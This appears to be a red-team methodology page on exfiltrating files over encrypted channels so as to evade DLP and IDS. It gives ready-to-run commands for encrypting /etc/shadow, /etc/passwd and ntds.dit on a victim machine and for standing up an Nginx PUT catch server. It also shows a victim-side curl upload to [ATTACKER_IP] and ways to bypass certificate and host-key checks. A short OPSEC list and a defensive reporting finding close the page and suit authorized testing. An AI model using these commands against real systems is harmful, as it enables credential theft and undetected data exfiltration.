π‘οΈ Methodology Checklist
- Confirm standard HTTP is blocked or monitored
- HTTPS server:
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 1 -out cert.pem && python3 -c "...ssl wrap..." - PowerShell HTTPS download (skip cert check):
-SkipCertificateCheckflag (PS 7+) or[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} - SMB over TLS: use
impacket-smbserverwith-smb2support - Verify transfer completed and clean up server
π― Operational Context
Use when: Network monitoring is present and plaintext HTTP transfers would be detected or DLP would inspect content β use encrypted channels (HTTPS, SCP, SMB signing).
Think Dumber First: HTTPS Python server takes 2 extra minutes to set up: openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 1 -nodes -subj '/CN=localhost' then python3 -c "import http.server,ssl; ...". Worth it on monitored networks.
Skip when: Lab environment with no network monitoring β stick with HTTP for speed.
β‘ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc | Encrypt file with AES-256 + PBKDF2 (Linux) |
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd | Decrypt AES-256 PBKDF2 file (Linux) |
Import-Module .\Invoke-AESEncryption.ps1 | Load AES encryption module (Windows) |
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\scan-results.txt | Encrypt file on Windows (outputs .aes) |
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\scan-results.txt.aes | Decrypt AES file on Windows |
sudo mkdir -p /var/www/uploads/SecretUploadDirectory | Create upload directory for Nginx catch server |
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory | Set permissions for Nginx web user |
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/ | Enable Nginx upload site |
sudo systemctl restart nginx.service | Restart Nginx after configuration |
curl -T /etc/passwd http://[TARGET_IP]:9001/SecretUploadDirectory/users.txt | Upload file to Nginx PUT endpoint |
tail -2 /var/log/nginx/error.log | Check Nginx errors if upload fails |
sudo rm /etc/nginx/sites-enabled/default | Remove conflicting default Nginx site |
π¬ Deep Dive & Workflow
When to Use Encrypted Transfers
During engagements, sensitive files (NTDS.dit, SAM, credentials, PII) must be protected in transit. Encrypted transfers bypass:
- Network DLP (Data Loss Prevention) inspection
- IDS signatures that detect cleartext credential patterns
- Content-based egress filters
Linux: OpenSSL AES-256
# Encrypt (on victim before exfil)
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/shadow -out shadow.enc
# Transfer via any method (nc, curl, scp)
# Decrypt on attacker
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in shadow.enc -out shadow-pbkdf2 + -iter 100000 makes brute-force resistant. Always use a strong password.
Windows: Invoke-AESEncryption PowerShell Script
The script must be copied to the target first (via file transfer), then imported:
# Import
Import-Module .\Invoke-AESEncryption.ps1
# Encrypt
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\ntds.dit
# Creates: ntds.dit.aes
# Also works on strings
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Text "SecretPassword"Nginx HTTPS Catch Server (Attacker-Side Setup)
For stealthy HTTPS-based file exfiltration from victims:
Nginx config (/etc/nginx/sites-available/upload.conf):
server {
listen 9001;
location /SecretUploadDirectory/ {
root /var/www/uploads;
dav_methods PUT;
}
}Victim uploads with:
curl -T /etc/passwd http://[ATTACKER_IP]:9001/SecretUploadDirectory/loot.txtVerify receipt:
ls -l /var/www/uploads/SecretUploadDirectory/OPSEC Notes
- Never exfiltrate real PII during authorized testing without explicit scope approval
- Use dummy files with fake PII when testing DLP egress filtering
- Encrypt before transfer; donβt rely on transport encryption alone if data is highly sensitive
- Use a unique strong password per engagement β leaked password exposes all encrypted loot
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| openssl self-signed cert rejected by wget | SSL verify by default | Add --no-check-certificate to wget or -k to curl |
| SCP transfer fails with host key error | New host, no known_hosts entry | Add -o StrictHostKeyChecking=no to bypass (lab only β not for production) |
| HTTPS Python server setup complex | SSL module errors | Use updog or sslserver Python package: pip3 install updog; updog -p 443 --ssl |
| SMB transfer blocked | Port 445 firewalled | Use SMB over QUIC (Windows 11) or pivot: impacket-smbserver via established tunnel |
| Encrypted transfer still detected | DPI doing cert inspection | Use a valid Letβs Encrypt cert on VPS; self-signed certs trigger DPI inspection alerts |
π Reporting Trigger
Finding Title: Encrypted File Transfer Channel Evades DLP Inspection Impact: TLS-encrypted file transfers prevent content-based DLP inspection, allowing payload delivery and data exfiltration to bypass security controls that rely on inspecting plaintext transfer content. Root Cause: Network monitoring limited to plaintext protocols. No SSL/TLS inspection (or inspection limited by certificate pinning/privacy policy). Recommendation: Implement SSL/TLS inspection at the perimeter for outbound traffic from server workloads. Alert on connections to unknown external IPs over 443. Deploy endpoint DLP in addition to network DLP.